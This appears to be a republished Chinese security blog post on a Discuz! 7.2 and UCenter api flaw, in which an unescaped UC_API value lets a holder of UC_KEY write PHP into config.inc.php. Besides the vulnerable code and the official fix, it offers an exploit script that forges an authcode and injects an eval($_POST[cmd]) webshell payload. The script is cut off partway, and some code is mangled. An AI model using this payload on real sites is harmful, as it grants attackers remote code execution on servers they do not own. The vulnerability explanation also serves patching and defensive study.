Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞

对于dz，我们比较关心的是拿shell，但dz的东西想拿shell太难太难了，上一篇文章的末尾铺垫了下，所以这篇文章也算不上马后炮了...这个 漏洞 已经在discuz! x1版本悄悄给补上了，但是7.2及以下含有uc接口的版本的均没有补。

这个漏洞其实也是老漏洞，去年大家就已经知道了，是二次写配置文件的漏洞，就是年初 创始人通过后台ucenter拿shell漏洞 的另外的利用办法。 很多人知道了，uc.php里的代码跟那个setting.inc.php相仿，但是dz官方在修复后台的时候没有同时对此进行修复，于是使这个漏洞一直存在至今。

当然，漏洞是依旧是鸡肋的，想要利用这个漏洞，必须满足两点条件：

1.必须知道UC_KEY，通常在配置文件里，或者ucenter的原始（没有经过修改的） 数据库 （应用）中；

2.配置文件config.inc.php必须可写。

好了，看看代码吧：

... function updateapps($get, $post) {         global $_DCACHE;         if(!API_UPDATEAPPS) {             return API_RETURN_FORBIDDEN;         }         $UC_API = $post[UC_API];         if(empty($post) || empty($UC_API)) {             return API_RETURN_SUCCEED;         }         $cachefile = $this->appdiruc_client/data/cache/apps.php;         $fp = fopen($cachefile, w);         $s = " <?phprn ";         $s .= $_CACHE[apps] = .var_export($post, TRUE)." ; rn ";         fwrite($fp, $s);         fclose($fp);         if(is_writeable($this->appdirconfig.inc.php)) {             $configfile = trim(file_get_contents($this->appdirconfig.inc.php));             $configfile = substr($configfile, -2) == ?> ? substr($configfile, 0, -2) : $configfile;             $configfile = preg_replace(" / define ( UC_API , s * .*? );/ i ", " define ( UC_API ,  $UC_API ); ", $configfile);//这里的问题             if($fp = @fopen($this->appdirconfig.inc.php, w)) {                 @fwrite($fp, trim($configfile));                 @fclose($fp);             }         }         global $_DCACHE;         require_once $this->appdirforumdata/cache/cache_settings.php;         require_once $this->appdirinclude/cache.func.php;         foreach($post as $appid => $app) {             if(!empty($app[viewprourl])) {                 $_DCACHE[settings][ucapp][$appid][viewprourl] = $app[url].$app[viewprourl];             }         }         updatesettings();         return API_RETURN_SUCCEED;     } ...

怎么修复，discuz! x1里是这么修复的：

$configfile = preg_replace("/define(UC_API,s*.*?);/i", "define(UC_API, ".addslashes($UC_API).");", $configfile);

具体我就不详细分析了，以前就讲过，大家可以看我之前那篇博文： html ">http://HdhCmsTest2cto测试数据/Article/201001/44300.html

好久没看dz了，曾经的、保留很久的get webshell的漏洞基本都一个个被公布，然后被补上了...希望大家还是留点有用的漏洞吧，不然真没的玩啦（如果在后台还有的话）...

给出一个Exp：

<?php     $timestamp  =  time ()+ 10 * 3600 ;      $host = "bbs.xxxxxx测试数据" ;      $uc_key = "A1v8Z5Z7feZdmfcd72J5C5V8hc8dM4F6V2g0h5ofXdS6jcm1C78bZede39z51610" ;      $code = urlencode ( _authcode ( "time=$timestamp&action=updateapps" ,  ENCODE ,  $uc_key ));      $cmd1 = <?xml version="1.0" encoding="ISO-8859-1"?> <root>  <item id="UC_API">xxx);eval($_POST[cmd]);//</item> </root> ;      $cmd2

查看更多关于Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞的详细内容...